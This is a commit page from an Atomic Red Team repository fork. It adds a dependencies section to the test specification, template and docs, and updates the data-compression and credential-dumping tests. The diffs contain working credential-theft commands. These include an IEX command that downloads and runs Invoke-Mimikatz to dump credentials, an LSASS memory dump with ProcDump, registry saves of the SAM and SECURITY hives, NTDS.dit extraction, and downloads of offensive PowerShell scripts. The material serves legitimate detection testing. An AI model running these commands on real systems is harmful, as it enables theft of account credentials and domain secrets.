adam/atomic-red-team-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

Add Dependencies section to test Yaml and support to use them in the PS execution framework (#772)

Browse Source 
* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* first draft at dependencies

* lowercase url
This commit is contained in:
Carrie Roberts
2020-01-09 07:36:08 -07:00
committed by Michael Haag
parent 550ba03c22
commit 511bb87af2
202 changed files with 5272 additions and 5691 deletions
Download Patch File Download Diff File Expand all files Collapse all files
atomic_red_team/atomic_doc_template.md.erb
+21 -13
View File
@@ -19,15 +19,13 @@
case p
when 'macos'
'macOS'
when 'centos'
'CentOS'
else
p.capitalize
end
end.join(', ') %>
<% if test['input_arguments'].to_a.count > 0 %>
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
<% test['input_arguments'].each do |arg_name, arg_options| -%>
@@ -37,24 +35,16 @@ end.join(', ') %>
<%- if test['executor']['name'] == 'manual' -%>
#### Run it with these steps! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
<%= test['executor']['steps'] %>
<%- else -%>
#### Run it with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
#### Attack Commands: Run with `<%= test['executor']['name'] %>`! <%- if test['executor']['elevation_required'] -%> Elevation Required (e.g. root or admin) <%- end -%>
```
<%= test['executor']['command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['prereq_command'] != nil -%>
#### Commands to Check Prerequisites:
```
<%= test['executor']['prereq_command'].to_s.strip %>
```
<%- end -%>
<%- if test['executor']['cleanup_command'] != nil -%>
#### Cleanup Commands:
```
@@ -62,5 +52,23 @@ end.join(', ') %>
```
<%- end -%>
<% if test['dependencies'].to_a.count > 0 %>
#### Dependencies: Run with `<%- if test['dependency_executor_name'] != nil%><%= test['dependency_executor_name'] %><%- else -%><%= test['executor']['name'] %><%- end -%>`!
<% test['dependencies'].each do | dep | -%>
##### Description: <%= dep['description'].strip! %>
##### Check Prereq Commands:
```
<%= dep['prereq_command'].strip! %>
```
##### Get Prereq Commands:
```
<%= dep['get_prereq_command'].strip! %>
```
<% end -%>
<% end -%>
<br/>
<%- end -%>
atomic_red_team/atomic_red_team.rb
+1 -1
View File
@@ -84,7 +84,7 @@ class AtomicRedTeam
raise("`atomic_tests[#{i}].supported_platforms` element is required") unless atomic.has_key?('supported_platforms')
raise("`atomic_tests[#{i}].supported_platforms` element must be an Array (was a #{atomic['supported_platforms'].class.name})") unless atomic['supported_platforms'].is_a?(Array)
valid_supported_platforms = ['windows', 'centos', 'ubuntu', 'macos', 'linux']
valid_supported_platforms = ['windows', 'macos', 'linux']
atomic['supported_platforms'].each do |platform|
if !valid_supported_platforms.include?(platform)
raise("`atomic_tests[#{i}].supported_platforms` '#{platform}' must be one of #{valid_supported_platforms.join(', ')}")
atomic_red_team/atomic_test_template.yaml
+9 -4
View File
@@ -10,8 +10,6 @@ atomic_tests:
supported_platforms:
- windows
- macos
- centos
- ubuntu
- linux
input_arguments:
@@ -20,11 +18,18 @@ atomic_tests:
type: todo
default: TODO
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
executor:
name: command_prompt
elevation_required: true # indicates whether command must be run with admin privileges. If the elevation_required attribute is not defined, the value is assumed to be false
prereq_command: | # for the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success. You can remove the prereq_command section if there are no pre-req's
TODO
command: | # these are the actaul attack commands, at least one command must be provided
TODO
cleanup_command: | # you can remove the cleanup_command section if there are no cleanup commands
atomic_red_team/spec.yaml
+30 -5
View File
@@ -13,8 +13,8 @@
# atomic_red_team/atomics
# atomic_red_team/atomics/T1234
# atomic_red_team/atomics/T1234/T1234.yaml <-- this is where all the atomic tests live
# atomic_red_team/atomics/T1234/payload1.sct <-- a payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/payload2.dll <-- another payload file needed by one of the T1234 atomics
# atomic_red_team/atomics/T1234/src/payload1.sct <-- a payload file needed by one of the T1234 atomics (human readable)
# atomic_red_team/atomics/T1234/bin/payload2.dll <-- another payload file needed by one of the T1234 atomics (binary)
#
# In general, a set of atomic tests for a technique should never depend on payloads
# or supporting files from other atomic directories. We want to keep things nice and close.
@@ -74,7 +74,32 @@ atomic_tests:
type: Url
default: 0000:00:30
# a list of executors that can execute this atomic test. There are almost always going to be one of these
dependency_executor_name: powershell # (optional) The executor for the prereq commands, defaults to the same executor used by the attack commands
dependencies: # (optional)
# a list of dependies that must be met to successfully run this atomic
- description: |
TODO
prereq_command: | # commands to check if prerequisites for running this test are met. For the "command_prompt" executor, if any command returns a non-zero exit code, the pre-requisites are not met. For the "powershell" executor, all commands are run as a script block and the script block must return 0 for success.
TODO
get_prereq_command: | # commands to meet this prerequisite or a message describing how to meet this prereq
TODO
#example of two dependencies
dependencies:
- description: |
Sysmon executable must be available
prereq_command: |
where sysmon > nul
get_prereq_command: |
echo Automated installer not implemented yet, please install Sysmon manually
- description: |
Sysmon must be installed
prereq_command: |
sc query sysmon > nul
get_prereq_command: |
sysmon -i -accepteula
# a list of executors that can execute the attack commands of this atomic test. There are almost always going to be one of these
# per test, but there are cases where you may have multiple - for example, separate executors for `sh`
# and `bash` when working on linux OSes.
executors:
@@ -161,8 +186,8 @@ atomic_tests:
blah blah blah
supported_platforms:
- macos
- centos
- ubuntu
- linux
# in this example we have no input arguments
input_arguments:
executors:
atomics/T1002/T1002.md
+75 -29
View File
@@ -23,23 +23,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed into our output file | Path | $env:USERPROFILE|
| output_file | Path where resulting compressed data should be placed | Path | $env:USERPROFILE\data.zip|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
```
#### Cleanup Commands:
```
Remove-Item -path #{output_file}
```
<br/>
<br/>
@@ -49,28 +53,44 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_path | Path that should be compressed into our output file | Path | %USERPROFILE%|
| file_extension | Extension of files to compress | String | .txt|
| output_file | Path where resulting compressed data should be placed | Path | %USERPROFILE%\data.rar|
| rar_installer | Winrar installer | Path | %TEMP%\winrar.exe|
| rar_exe | The RAR executable from Winrar | Path | %programfiles%/WinRAR/Rar.exe|
#### Run it with `command_prompt`!
```
rar a -r #{output_file} #{input_path} *#{file_extension}
```
#### Commands to Check Prerequisites:
#### Attack Commands: Run with `command_prompt`!
```
rar /?
"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
```
#### Cleanup Commands:
```
del -f
del #{output_file}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Rar tool must be installed at specified location (#{rar_exe})
##### Check Prereq Commands:
```
if not exist "#{rar_exe}" (exit /b 1)
```
##### Get Prereq Commands:
```
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
echo Follow the installer prompts to install Winrar
#{rar_installer}
```
<br/>
<br/>
@@ -80,27 +100,38 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_files | Path that should be compressed into our output file, may include wildcards | Path | $HOME/*.txt|
| output_file | Path that should be output as a zip archive | Path | $HOME/data.zip|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
zip #{output_file} #{input_files}
```
#### Commands to Check Prerequisites:
```
ls #{input_file}
```
#### Cleanup Commands:
```
rm -f
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Files to zip must exist (#{input_files})
##### Check Prereq Commands:
```
ls #{input_files}
```
##### Get Prereq Commands:
```
echo Please set input_files argument to include files that exist
```
<br/>
<br/>
@@ -110,23 +141,27 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file | Path that should be compressed | Path | $HOME/victim-gzip.txt|
| input_content | contents of compressed files if file does not already exist. default contains test credit card and social security number | String | confidential! SSN: 078-05-1120 - CCN: 4000 1234 5678 9101|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
test -e #{input_file} && gzip -k #{input_file} || (echo '#{input_content}' >> #{input_file}; gzip -k #{input_file})
```
#### Cleanup Commands:
```
rm -f #{input_file}.gz
```
<br/>
<br/>
@@ -136,25 +171,36 @@ An adversary may compress data (e.g., sensitive documents) that is collected pri
**Supported Platforms:** Linux, macOS
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| input_file_folder | Path that should be compressed | Path | $HOME/$USERNAME|
| output_file | File that should be output | Path | $HOME/data.tar.gz|
#### Run it with `sh`!
#### Attack Commands: Run with `sh`!
```
tar -cvzf #{output_file} #{input_file_folder}
```
#### Commands to Check Prerequisites:
```
test -e #{input_file_folder}
```
#### Cleanup Commands:
```
rm -f #{output_file}
```
#### Dependencies: Run with `sh`!
##### Description: Folder to zip must exist (#{input_file_folder})
##### Check Prereq Commands:
```
test -e #{input_file_folder}
```
##### Get Prereq Commands:
```
echo Please set input_file_folder argument to a folder that exists
```
<br/>
atomics/T1002/T1002.yaml
+44 -9
View File
@@ -43,15 +43,33 @@ atomic_tests:
description: Path where resulting compressed data should be placed
type: Path
default: '%USERPROFILE%\data.rar'
rar_installer:
description: Winrar installer
type: Path
default: '%TEMP%\winrar.exe'
rar_exe:
description: The RAR executable from Winrar
type: Path
default: "%programfiles%/WinRAR/Rar.exe"
dependencies:
- description: |
Rar tool must be installed at specified location (#{rar_exe})
prereq_command: |
if not exist "#{rar_exe}" (exit /b 1)
get_prereq_command: |
echo Downloading Winrar installer
bitsadmin /transfer myDownloadJob /download /priority normal "https://www.win-rar.com/fileadmin/winrar-versions/winrar/th/winrar-x64-580.exe" #{rar_installer}
echo Follow the installer prompts to install Winrar
#{rar_installer}
executor:
name: command_prompt
elevation_required: false
prereq_command: |
rar /?
command: |
rar a -r #{output_file} #{input_path} *#{file_extension}
cleanup_command:
del -f #{output_file}
"#{rar_exe}" a -r #{output_file} #{input_path} *#{file_extension}
cleanup_command: |
del #{output_file}
- name: Data Compressed - nix - zip
description: |
@@ -59,6 +77,7 @@ atomic_tests:
supported_platforms:
- linux
- macos
input_arguments:
input_files:
description: Path that should be compressed into our output file, may include wildcards
@@ -68,14 +87,23 @@ atomic_tests:
description: Path that should be output as a zip archive
type: Path
default: $HOME/data.zip
dependencies:
- description: |
Files to zip must exist (#{input_files})
prereq_command: |
ls #{input_files}
get_prereq_command: |
echo Please set input_files argument to include files that exist
executor:
name: sh
elevation_required: false
prereq_command: |
ls #{input_file}
ls #{input_files} > /dev/null
command: |
zip #{output_file} #{input_files}
cleanup_command:
cleanup_command: |
rm -f #{output_file}
- name: Data Compressed - nix - gzip Single File
@@ -116,11 +144,18 @@ atomic_tests:
description: File that should be output
type: Path
default: '$HOME/data.tar.gz'
dependencies:
- description: |
Folder to zip must exist (#{input_file_folder})
prereq_command: |
test -e #{input_file_folder}
get_prereq_command: |
echo Please set input_file_folder argument to a folder that exists
executor:
name: sh
elevation_required: false
prereq_command: |
test -e #{input_file_folder}
command: |
tar -cvzf #{output_file} #{input_file_folder}
cleanup_command: |
atomics/T1003/T1003.md
+227 -38
View File
@@ -165,60 +165,107 @@ The /proc filesystem on Linux contains a great deal of information regarding the
<br/>
## Atomic Test #1 - Powershell Mimikatz
Dumps Credentials via Powershell by invoking a remote mimikatz script
Dumps credentials from memory via Powershell by invoking a remote mimikatz script
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| remote_script | URL to a remote Mimikatz script that dumps credentials | Url | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
```
<br/>
<br/>
## Atomic Test #2 - Gsecdump
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
Dump credentials from memory using Gsecdump
**Supported Platforms:** Windows
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gsecdump_exe | Path to the Gsecdump executable | Path | PathToAtomicsFolder\T1003\bin\gsecdump.exe|
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
gsecdump -a
#{gsecdump_exe} -a
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
##### Check Prereq Commands:
```
if (Test-Path #{gsecdump_exe}) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Automated installer not implemented yet
```
<br/>
<br/>
## Atomic Test #3 - Windows Credential Editor
http://www.ampliasecurity.com/research/windows-credentials-editor/
Dump credentials from memory using Windows Credential Editor from https://www.ampliasecurity.com/research/windows-credentials-editor/
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_file | Path where resulting data should be placed | Path | output.txt|
| output_file | Path where resulting data should be placed | Path | %temp%\output.txt|
| wce_exe | Path of Windows Credential Editor executable | Path | PathToAtomicsFolder\T1003\bin\wce.exe|
| wce_url | Path to download Windows Credential Editor zip file | URL | https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip|
| wce_zip_hash | File hash of the Windows Credential Editor zip file | String | 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
wce -o #{output_file}
#{wce_exe} -o #{output_file}
```
#### Dependencies: Run with `powershell`!
##### Description: Windows Credential Editor must exist on disk at specified location (#{wce_exe})
##### Check Prereq Commands:
```
if (Test-Path #{wce_exe}) {0} else {1}
```
##### Get Prereq Commands:
```
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
```
<br/>
<br/>
@@ -241,7 +288,6 @@ reg save HKLM\system "#{output_folder}\system"
reg save HKLM\security "#{output_folder}\security"
```
#### Cleanup Commands:
```
rm "#{output_folder}\sam"
@@ -249,6 +295,10 @@ rm "#{output_folder}\system"
rm "#{output_folder}\security"
```
<br/>
<br/>
@@ -259,13 +309,13 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| procdump_binary_path | Path of the ProcDump binary | string | $PathToAtomicsFolder\T1003\bin\procdump64.exe|
| output_file | Path where resulting dump should be placed | Path | C:\Windows\Temp\lsass_dump.dmp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
#{procdump_binary_path} -accepteula -ma lsass.exe #{output_file}
```
@@ -276,6 +326,23 @@ ProcDump. The tool may be downloaded from https://docs.microsoft.com/en-us/sysin
rm "#{output_file}"
```
#### Dependencies: Run with `powershell`!
##### Description: ProcDump tool from Sysinternals must exist on disk at specified location (#{procdump_exe})
##### Check Prereq Commands:
```
if (Test-Path #{procdump_exe}) {0} else {1}
```
##### Get Prereq Commands:
```
Invoke-WebRequest "https://download.sysinternals.com/files/Procdump.zip" -OutFile "$env:TEMP\Procdump.zip"
Expand-Archive $env:TEMP\Procdump.zip $env:TEMP\Procdump -Force
New-Item -ItemType Directory (Split-Path #{procdump_exe}) -Force | Out-Null
Copy-Item $env:TEMP\Procdump\Procdump.exe #{procdump_exe} -Force
```
<br/>
<br/>
@@ -286,8 +353,7 @@ Manager and administrative permissions.
**Supported Platforms:** Windows
#### Run it with these steps!
1. Open Task Manager:
#### Run it with these steps! 1. Open Task Manager:
On a Windows system this can be accomplished by pressing CTRL-ALT-DEL and selecting Task Manager or by right-clicking
on the task bar and selecting "Task Manager".
@@ -302,6 +368,8 @@ Manager and administrative permissions.
<br/>
<br/>
@@ -312,7 +380,7 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| mimikatz_binary_path | Path of the Mimikatz binary | string | $PathToAtomicsFolder\T1003\bin\mimikatz.exe|
@@ -325,6 +393,8 @@ Mimikatz. This tool is available at https://github.com/gentilkiwi/mimikatz.
<br/>
<br/>
@@ -336,18 +406,33 @@ subsequent domain controllers without the need of network-based replication.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| output_folder | Path where resulting dump should be placed | Path | C:\Windows\Temp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
ntdsutil "ac i ntds" "ifm" "create full #{output_folder}" q q
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
@@ -357,18 +442,33 @@ The Active Directory database NTDS.dit may be dumped by copying it from a Volume
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| drive_letter | Drive letter to source VSC (including colon) | String | C:|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
vssadmin.exe create shadow /for=#{drive_letter}
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
<br/>
<br/>
@@ -382,13 +482,14 @@ This test must be executed on a Windows Domain Controller.
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| vsc_name | Name of Volume Shadow Copy | String | \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1|
| extract_path | Path for extracted NTDS.dit | Path | C:\Windows\Temp|
#### Run it with `command_prompt`! Elevation Required (e.g. root or admin)
#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin)
```
copy #{vsc_name}\Windows\NTDS\NTDS.dit #{extract_path}\ntds.dit
copy #{vsc_name}\Windows\System32\config\SYSTEM #{extract_path}\VSC_SYSTEM_HIVE
@@ -403,6 +504,38 @@ rm "#{extract_path}\VSC_SYSTEM_HIVE"
rm "#{extract_path}\SYSTEM_HIVE"
```
#### Dependencies: Run with `command_prompt`!
##### Description: Target must be a Domain Controller
##### Check Prereq Commands:
```
reg query HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\ProductOptions /v ProductType | findstr LanmanNT
```
##### Get Prereq Commands:
```
echo Sorry, Promoting this machine to a Domain Controller must be done manually
```
##### Description: Volume shadow copy must exist
##### Check Prereq Commands:
```
if not exist #{vsc_name} (exit /b 1)
```
##### Get Prereq Commands:
```
echo Run "Invoke-AtomicTest T1003 -TestName 'Create Volume Shadow Copy with NTDS.dit'" to fulfuill this requirement
```
##### Description: Extract path must exist
##### Check Prereq Commands:
```
if not exist #{extract_path} (exit /b 1)
```
##### Get Prereq Commands:
```
mkdir #{extract_path}
```
<br/>
<br/>
@@ -412,13 +545,28 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
**Supported Platforms:** Windows
#### Run it with `command_prompt`!
#### Attack Commands: Run with `command_prompt`!
```
findstr /S cpassword %logonserver%\sysvol\*.xml
```
#### Dependencies: Run with `powershell`!
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Joining this computer to a domain must be done manually
```
<br/>
<br/>
@@ -428,12 +576,14 @@ Look for the encrypted cpassword value within Group Policy Preference files on t
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | $PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1|
| gpp_script_path | Path to the Get-GPPPassword PowerShell Script | Path | PathToAtomicsFolder\T1003\src\Get-GPPPassword.ps1|
| gpp_script_url | URL of the Get-GPPPassword PowerShell Script | URL | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/87630cac639f29c2adcb163f661f02890adf4bdd/Exfiltration/Get-GPPPassword.ps1|
#### Run it with `powershell`!
#### Attack Commands: Run with `powershell`!
```
. #{gpp_script_path}
Get-GPPPassword -Verbose
@@ -441,6 +591,30 @@ Get-GPPPassword -Verbose
#### Dependencies: Run with `powershell`!
##### Description: Get-GPPPassword PowerShell Script must exist at #{gpp_script_path}
##### Check Prereq Commands:
```
if(Test-Path "#{gpp_script_path}") { 0 } else { 1 }
```
##### Get Prereq Commands:
```
New-Item -ItemType Directory (Split-Path "#{gpp_script_path}") -Force | Out-Null
Invoke-WebRequest #{gpp_script_url} -OutFile "#{gpp_script_path}"
```
##### Description: Computer must be domain joined
##### Check Prereq Commands:
```
if((Get-CIMInstance -Class Win32_ComputerSystem).PartOfDomain) {0} else {1}
```
##### Get Prereq Commands:
```
Write-Host Joining this computer to a domain must be done manually
```
<br/>
<br/>
@@ -451,22 +625,21 @@ Credit to Joe Bialek (https://github.com/PowerShellMafia/PowerSploit/blob/master
**Supported Platforms:** Windows
#### Inputs
#### Inputs:
| Name | Description | Type | Default Value |
|------|-------------|------|---------------|
| sam_binary_path | Path of the SAM file | string | C:\Windows\System32\config\sam|
| system_binary_path | Path of the SYSTEM file | string | C:\Windows\System32\config\system|
| security_binary_path | Path of the SECURITY file | string | C:\Windows\System32\config\security|
| ninjacopy_script_path | Path to the Invoke-NinjaCopy PowerShell script | Path | PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1|
| ninjacopy_script_url | URL of the Invoke-NinjaCopy PowerShell Script | URL | https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/6b0ada999a9d2be8c6c9267da57b898494d13219/Exfiltration/Invoke-NinjaCopy.ps1|
| output_folder | Output folder path | Path | C:\Windows\Temp|
#### Run it with `powershell`! Elevation Required (e.g. root or admin)
```
. $PathToAtomicsFolder\T1003\src\Invoke-NinjaCopy.ps1
Invoke-NinjaCopy -Path "#{sam_binary_path}" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "#{system_binary_path}" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "#{security_binary_path}" -LocalDestination "#{output_folder}\security"
```
#### Attack Commands: Run with `powershell`! Elevation Required (e.g. root or admin)
```
. #{ninjacopy_script_path}
Invoke-NinjaCopy -Path "%systemroot%\System32\sam" -LocalDestination "#{output_folder}\sam"
Invoke-NinjaCopy -Path "%systemroot%\System32\system" -LocalDestination "#{output_folder}\system"
Invoke-NinjaCopy -Path "%systemroot%\System32\security" -LocalDestination "#{output_folder}\security"
```
#### Cleanup Commands:
```
@@ -475,4 +648,20 @@ rm "#{output_folder}\system"
rm "#{output_folder}\security"
```
#### Dependencies: Run with `powershell`!
##### Description: Invoke-NinjaCopy PowerShell Script must exist at #{ninjacopy_script_path}
##### Check Prereq Commands:
```
if(Test-Path "#{ninjacopy_script_path}") { 0 } else { 1 }
```
##### Get Prereq Commands:
```
New-Item -ItemType Directory (Split-Path "#{ninjacopy_script_path}") -Force | Out-Null
Invoke-WebRequest #{ninjacopy_script_url} -OutFile "#{ninjacopy_script_path}"
```
<br/>
atomics/T1003/T1003.yaml
+349 -246
View File
@@ -3,296 +3,399 @@ attack_technique: T1003
display_name: Credential Dumping
atomic_tests:
- name: Powershell Mimikatz
description: |
Dumps Credentials via Powershell by invoking a remote mimikatz script
- name: Powershell Mimikatz
description: |
Dumps credentials from memory via Powershell by invoking a remote mimikatz script
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
executor:
name: powershell
elevation_required: true
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
supported_platforms:
- windows
- name: Gsecdump
description: |
Dump credentials from memory using Gsecdump
supported_platforms:
- windows
input_arguments:
remote_script:
description: URL to a remote Mimikatz script that dumps credentials
type: Url
default: https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b1004daf8b3ec08007a0b945b91253a/Exfiltration/Invoke-Mimikatz.ps1
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: Path
default: PathToAtomicsFolder\T1003\bin\gsecdump.exe
executor:
name: powershell
elevation_required: true
command: |
IEX (New-Object Net.WebClient).DownloadString('#{remote_script}'); Invoke-Mimikatz -DumpCreds
dependency_executor_name: powershell
dependencies:
- description: |
Windows Credential Editor must exist on disk at specified location (#{gsecdump_exe})
prereq_command: |
if (Test-Path #{gsecdump_exe}) {0} else {1}
get_prereq_command: |
Write-Host Automated installer not implemented yet
- name: Gsecdump
description: |
https://www.truesec.se/sakerhet/verktyg/saakerhet/gsecdump_v2.0b5
executor:
name: command_prompt
elevation_required: true
command: |
#{gsecdump_exe} -a
supported_platforms:
- windows
- name: Windows Credential Editor
description: |
Dump credentials from memory using Windows Credential Editor from https://www.ampliasecurity.com/research/windows-credentials-editor/
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
gsecdump -a
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: "%temp%\\output.txt"
wce_exe:
description: Path of Windows Credential Editor executable
type: Path
default: PathToAtomicsFolder\T1003\bin\wce.exe
wce_url:
description: Path to download Windows Credential Editor zip file
type: url
default: https://www.ampliasecurity.com/research/wce_v1_41beta_universal.zip
wce_zip_hash:
description: File hash of the Windows Credential Editor zip file
type: String
default: 8F4EFA0DDE5320694DD1AA15542FE44FDE4899ED7B3A272063902E773B6C4933
- name: Windows Credential Editor
description: |
http://www.ampliasecurity.com/research/windows-credentials-editor/
dependency_executor_name: powershell
dependencies:
- description: |
Windows Credential Editor must exist on disk at specified location (#{wce_exe})
prereq_command: |
if (Test-Path #{wce_exe}) {0} else {1}
get_prereq_command: |
$parentpath = Split-Path "#{wce_exe}"; $zippath = "$parentpath\wce.zip"
if(Invoke-WebRequestVerifyHash "#{wce_url}" "$zippath" #{wce_zip_hash}){
Expand-Archive $zippath $parentpath\wce -Force
Move-Item $parentpath\wce\wce.exe "#{wce_exe}"
Remove-Item $zippath, $parentpath\wce -Recurse
}
supported_platforms:
- windows
executor:
name: command_prompt
elevation_required: true
command: |
#{wce_exe} -o #{output_file}
input_arguments:
output_file:
description: Path where resulting data should be placed
type: Path
default: output.txt
- name: Registry dump of SAM, creds, and secrets
